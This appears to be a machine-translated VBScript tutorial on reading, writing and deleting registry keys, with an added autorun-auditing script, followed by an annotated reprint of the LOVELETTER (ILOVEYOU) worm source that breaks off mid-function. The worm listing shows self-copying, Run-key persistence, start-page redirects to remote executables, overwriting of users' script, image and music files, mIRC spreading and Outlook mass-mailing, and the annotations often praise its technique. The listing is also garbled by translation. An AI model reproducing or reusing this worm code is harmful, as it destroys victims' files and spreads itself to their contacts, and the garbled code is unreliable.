VBScript programming 5
The registry: modifying the registry is a basic programming skill, and scripting is of course no exception.
I will not explain the basic structure of the registry again here.
1. Read registry keys and values:
Use the RegRead method of the WshShell object, passing it the full path of the key or value.
For example:
' Read the NWIZ value under the Run key and display it
Set ws = WScript.CreateObject("WScript.Shell")
v = ws.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NWIZ")
WScript.Echo v
2. Write to the registry:
Writing uses the RegWrite method of the WshShell object.
For example:
' Set the value JJ under the Run key to "Hello"
path = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
Set ws = WScript.CreateObject("WScript.Shell")
ws.RegWrite path & "JJ", "Hello"
This changes the value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\JJ to Hello. But note: this value must already exist.
To create a new key, use the same method:
' A path ending in a backslash names a key; RegWrite sets that key's default value
path = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSSA2000\Love\"
Set ws = WScript.CreateObject("WScript.Shell")
ws.RegWrite path, "nenboy"
' Read the value back and display it
val = ws.RegRead(path)
WScript.Echo val
3. Delete keys and values:
Pass the complete path to the RegDelete method.
For example:
' RegDelete is the WshShell method name; it returns no value
ws.RegDelete path
Note: if you want to delete only the value of a key, be sure to add "\" to the path; if you do not add the backslash, you will delete the entire key.
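An added example, not part of the original tutorial: section 1 reads a single value under the Run key, and the annotations in the virus listing further down advise checking that branch regularly. WshShell cannot enumerate values, so this sketch assumes the WMI StdRegProv provider is available; the list of script extensions it flags is an assumption chosen for illustration.

```vbscript
' Added example: list autorun values and flag those that launch script files.
Option Explicit
Const HKCU = &H80000001
Const HKLM = &H80000002
Const REG_SZ = 1
Const REG_EXPAND_SZ = 2

Dim reg, h, k
Set reg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")

For Each h In Array(HKLM, HKCU)
    For Each k In Array("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", _
                        "SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices")
        AuditKey h, k
    Next
Next

Sub AuditKey(hive, subKey)
    Dim names, types, i, data, flag
    ' EnumValues returns non-zero if the key is missing; names is Null if it has no values
    If reg.EnumValues(hive, subKey, names, types) <> 0 Then Exit Sub
    If Not IsArray(names) Then Exit Sub
    For i = 0 To UBound(names)
        data = ""
        If types(i) = REG_SZ Then
            reg.GetStringValue hive, subKey, names(i), data
        ElseIf types(i) = REG_EXPAND_SZ Then
            reg.GetExpandedStringValue hive, subKey, names(i), data
        End If
        If IsNull(data) Then data = ""
        flag = "      "
        If LaunchesScript(data) Then flag = "CHECK "
        WScript.Echo flag & HiveName(hive) & "\" & subKey & "\" & names(i) & " = " & data
    Next
End Sub

Function LaunchesScript(cmd)
    Dim ext
    LaunchesScript = False
    For Each ext In Array(".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta")
        If InStr(1, cmd, ext, vbTextCompare) > 0 Then LaunchesScript = True
    Next
End Function

Function HiveName(hive)
    If hive = HKLM Then HiveName = "HKLM" Else HiveName = "HKCU"
End Function
```

Run it with cscript so the output goes to the console; lines prefixed with CHECK are autorun entries whose command references a script file and deserve a closer look.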
OK, that covers the most basic script programming. Scripting really is quite simple. Have a look at the source code of the famous LOVELETTER virus below: apart from the email part, which I have not covered, everything else should be clear.
REM BAROK -LOVELETTER (VBE) Rem by: spyder / ispyder@mail.com / @grammersoft group / manila, philip pines' Note: Program author's signature (possib) on Error ResMe Next Dim Fso, Dirsystem, Dirwin, Dirtemp, EQ, CTR, File, VBScopy, Dow EQ = "" CTR = 0 set fso = createObject ("scripting.filesystemObject") 'Note: FileSystemObject is the most dangerous part of the M $ VBVM system, its The function is very powerful 'Use FSO from the virus to know that by modifying the registry, it can easily prevent the LETTER episode. Set file = fso.opentextfile (wscript.scriptfullname, 1) 'Returns the full path of the current script vbscopy = file.readAll Main ()' Note - Program initialization is completed. sub main () On Error Resume Next dim wscr, rr set wscr = CreateObject ( "WScript.Shell") rr = wscr.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / Windows Scriptin g Host / Settings / Timeout") if (rr> = 1) THEN WSCR.REGWRITE "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Windows Scripting Host / Settings / Timeout", 0, "REG_DWORD" 'Note - Prevents the termination caused by the operation timeout. 'It should be said that programmers who write viruses take into account possible problems, this is worth all of the programming. Endiffialfolder (0) Set Dirsystem = fso.getspecialfolder (1) Set dirtemp = fso.getspecialFolder (2) 'Get the name of the system key folder "VB can be used when programming. Set c = fso.getfile (wscript.scriptfullname) 'Returns the full path of the current script C.copy (Dirsystem & "/ mskernel32.vbs")' Copies a specified file or folder from one location to another. C.copy (Dirwin & "/ Win32DLL.VBS ") C.copy (Dirsystem &" / Love-letter-for-you.txt.vbs ") 'Copy itself to the key directory. 'The file name is not very good. It's easy to find it. Regruns () html () spreadtoemail () ListAdriv () End Sub
Sub regruns () 'Modify the registry to automatically load the virus program' prevention: often check this branch in the registry. 'Known methods also put HTA in a Startup folder. The method used by the virus program is more advanced, 'Because it does not fail because of language problems.
On Error Resume Next Dim num, downread regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio n / Run / MSKernel32", dirsystem & "/ MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio n / RunServices / Win32DLL" , dirwin & "/ Win32DLL.vbs" downread = "" downread = regget ( "HKEY_CURRENT_USER / Software / Microsoft / Internet Explore r / Download Directory") if (downread = "") then downread = "c: /" end if if ( FileExist (Dirsystem & "/ Winfat32.exe") = 1) Ten Randomize Num = INT ((4 * RND) 1) if Num = 1 Then Regreate "HKCU / Software / Microsoft / Internet Explorer / Main / Start Page", " http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj w6587345gvsdf7679njbvYT / WIN-BUGSFIX.exe "elseif num = 2 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Start Page "," http: // www .skyinet.net / ~ angelcat / skladjflfdjghKJnwetryDGFikjUIyqwerWe 546786324hjk4jnHHGbvbmKLJKjhkqj4w / WIN-BUGSFIX.exe "elseif num = 3 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Sta rt Page "," http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm POhfgER67b3Vbvg / WIN-BUGSFIX.exe "elseif num = 4 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Start Page "," http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg / WIN-B UGSFIX.exe "end if end if if (fileexist (downread &" / WIN-BUGSFIX.exe ") = 0) then regcreate" HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio N / Run / Win-Bugsfix ", DownRead &"
/WIN-BUGSFIX.exe "regcreate" HKEY_CURRENT_USER / Software / Microsoft / Internet Explorer / Main / Start Page "," about: blank "end if end subsub folderlist (folderspec) 'Traverse Folder On Error Resume Next dim f, f1, sf set f = fso.getfolder (folderspec) set sf = f.subfolders 'Get all subfolders of a particular folder, including system hidden folder for Each F1 in sf' F1 object infectfiles for each subfolder (f1.path) 'Operation Folderlist (f1.path) in Infectious files Folder Download NEXT END SUB
Sub ListAdriv 'traverses all drives. On Error Resume Next DIM D, DC, S set DC = fso.drives for Each D in DC if D.driveType = 2 or D.DriveType = 3 THEN '2.3 is hard disk and network sharing disk FolderList (D.Path & "/ ") End if next listadriv = s end sub
Function FileExist (filespec) 'Judging whether the file has' purely from the technical perspective, this program is not working. 'Don't write so long, you can implement the same function on Error Resume next Dim Msg if (fso.fileexists (filespec)) THEN MSG = 0 else msg = 1 end if fileexist = msg End Function
Function FolderExist (folderspec) 'Decision is as stinking with the folder' and the previous program. On Error ResMe Next Dim Msg IF (Fso.GetFoldRexists (FSO.GETFOLDEREXISTS (Folderspec)) THEN MSG = 0 else msg = 1 end if fileexist = msg end function
Sub infectfiles (folderspec) 'Performs the operation of the infectious file.
On Error ResMe Next Dimf, F1, FC, EXT, AP, MIRCFNAME, S, BNAME, MP3 set f = fso.getfolder (folderspec) set fc = f.files' Get all files of a particular folder, including the system Hidden File for Each F1 in FC EXT = fso.GETEXTENSITIONNAME (F1.Path) 'Get Extensions EXT = LCase (EXT)' Transition to lowercase S = LCase (f1.name) IF (ext = "vbs") or (ext = "VBE") THEN SET AP = fso.opentextFile (f1.path, 2, true) ap.write vbscopy 'vbscopy = file.readall ap.close elseif (ext = "js") or (ext = "jse") OR (ext = "css") or (ext = "wsh") or (ext = "hta") The set ap = fso.opentextfile (f1.path, 2, true) AP. Write vbscopy ap.close bName = fso.getBaseName (f1.path) set copick = fso.getfile (f1.path) Cop.copy (folderspec & "/" & bname & ". vbs") fso.deletefile (f1.path) Elseif Ext = "jpg") or (ext = "jpeg") THEN SET AP = fso.opentextFile (f1.path, 2, true) ap.write vbscopy ap.close set cop = fso.getfile (f1.path) COP. COPY (F1.Path & "VBS") fso.deletefile (f1.path) Elseif (ext = "mp3") or (ext = "mp2") THEN SET MP3 = fso.createtextFile (f1.path & ". vbs") Mp3.write vbscopy mp3.close set at T = fso.getfile (f1.path) att.attributes = att.attributes 2 end if if (eq <> folderspec) THEN IF (S = "mirc32.exe") or (s = "mlink32.exe") or (s = "mirc.ini") or (s = "scri pt.ini") or (s = "mirc.hlp") THEN SET scriptini = fso.createtetextfile (Folderspec & "/ script.ini") scriptini.writeline [script] "scriptini.writeline"; mirc script "scriptini.writeline";
Please dont edit this script ... mirc will Corru PT, IF mirc will "scriptini.writeline" Corrupt ... Windows Will Affect and Will Not Run Correctly. Thanks "'The English in the virus Author did not learn well ... but so frightened People are also suffering. 'Here, you will remind you to pay attention, don't care about the scary text, you will find a lot of vulnerabilities. Scriptini.writeline ";" scriptini.writeline "; khaled mardam-bey" scriptini.writeline " http://www.mirl.com "scriptini.writeline"; "scriptini.writeline" n0 = on 1: join: #: {"scriptini.writeLine" n1 = / if ($ nick == $ me) {halt } "scriptini.writeline" n2 = /.dcc send $ nick "& Dirsystem &" / Love-letter-fo r-you.htm "scriptini.writeLine" N3 =} "pay attention, the result of this is that MIRC can also be infected Virus. Scriptini.close EQ = folderspec end if end if next end subsub regreate (regable, regvalue) 'Modifying the registry (creating key)' This program seems to be a Microsoft's demonstration program. SET regedit = CreateObject ("wscript.shell" ) regedit.regwrite regkey, Regvalue End Sub
Function Regget (Value) 'This program seems to be a Microsoft's demonstration program. (WSH Demonstration, in Windows Folder) SET regedit = CreateObject ("wscript.shell") regget = regedit.regread (value) end function
sub spreadtoemail () 'diffusion Email On Error Resume Next dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad set regedit = CreateObject ( "WScript.Shell") set out = WScript.CreateObject ( " Outlook.Application ") 'Virus Limitations: Only Outlook, and Outlook Express does not support. set mapi = out.GetNameSpace ( "MAPI") for ctrlists = 1 to mapi.AddressLists.Count set a = mapi.AddressLists (ctrlists) x = 1 regv = regedit.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / WAB /" & a ) IF (regv = ") THEN REGV = 1 end if if (int (a.addressentries.count)> int (regv)) THEN for ctrentries = 1 to a.addressentries.count MaleAd = a.addressentries (x) Regad = "" Regad = regedit.regread ("HKEY_CURRENT_USER / SOFTWARE / Microsoft / WAB /" & MALE AD) IF (regad = ") THEN SET MALE = out.createItem (0) Male.Recipients.Add (MaleAd) Male.Subject = "IloveYou" The reason for the name of the virus' "see such a message is definitely a virus. The normal person of the mind is probably not straightforward. male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from m e." male.Attachments.Add (dirsystem & "/ LOVELETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER / Software / Microsoft / WAB / "& malead, 1," REG_DWORD "end if x = x 1 next regedit.RegWrite" HKEY_CURRENT_USER / Software / Microsoft / WAB / "& a, a.Addre ssEntries.Count else regedit.RegWrite" HKEY_CURRENT_USER / Software / Microsoft / WAB / "& A, A.Addre Ssentries.count End End Set Out = Nothing SET MAPI = Nothing End Sub Sub HTML 'From the technical point of view, this program is very beautiful, the reason is to fully utilize Outlook Resource 'deserves the reference of the program. 'The _ symbol in the middle of the program is the cable, so the comment is written here. 'There are many invalid statements in the program, and there are a lot of space.
On Error ResMe next Dim line, N, DTA1, DTA2, DT1, DT2, DT3, DT4, L1, DT5, DT6 DTA1 = "